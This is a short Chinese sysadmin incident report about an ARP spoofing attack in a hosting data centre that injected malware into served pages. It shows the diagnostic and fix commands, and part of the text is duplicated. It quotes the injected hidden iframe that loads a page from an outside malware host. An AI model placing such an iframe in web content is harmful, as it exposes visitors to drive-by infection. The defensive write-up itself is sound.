今天在接机的路上接到同事电话说网站打开后乱码。同事怀疑受到病毒感染。但是在本机上用curl查看html内容是正常的,初步怀疑是被ARP攻击篡改缺省网关地址,然后挂马。下午一到公司就用curl在其它PC上面查看服务器的内容:
$ curl -i http://www.unknowndns.com/
然后看到content-type正常,html内容的头部被加上:
从而导致网页乱码,一查真的是木马。赶紧上服务器查看arp cache:
$ /sbin/arp -an
列出的信息与刚托管到IDC时保存的信息对比一下,发现缺省网关的MAC地址被修改成了另外一个MAC地址。于是赶紧修改成原来保存的MAC:
$ /sbin/arp -s 192.168.0.1 00:02:7E:20:06:10
用curl -i http://www.unknowndns.com/查看,被挂的代码消失。
疑问:IDC的交换机应该都有VLAN功能,为什么不能将一家的服务器通过VLAN将另外一家的服务器隔离,禁止ARP跨VLAN广播呢?
$ curl -i http://www.unknowndns.com/
然后看到content-type正常,html内容的头部被加上:
<iframe src=http://sina8488.com/admin/a93.htm width=20 height=0 frameborder=0></iframe>
从而导致网页乱码,一查真的是木马。赶紧上服务器查看arp cache:
$ /sbin/arp -an
列出的信息与刚托管到IDC时保存的信息对比一下,发现缺省网关的MAC地址被修改成了另外一个MAC地址。于是赶紧修改成原来保存的MAC:
$ /sbin/arp -s 192.168.0.1 00:02:7E:20:06:10
用curl -i http://www.unknowndns.com/查看,被挂的代码消失。
疑问:IDC的交换机应该都有VLAN功能,为什么不能将一家的服务器通过VLAN将另外一家的服务器隔离,禁止ARP跨VLAN广播呢?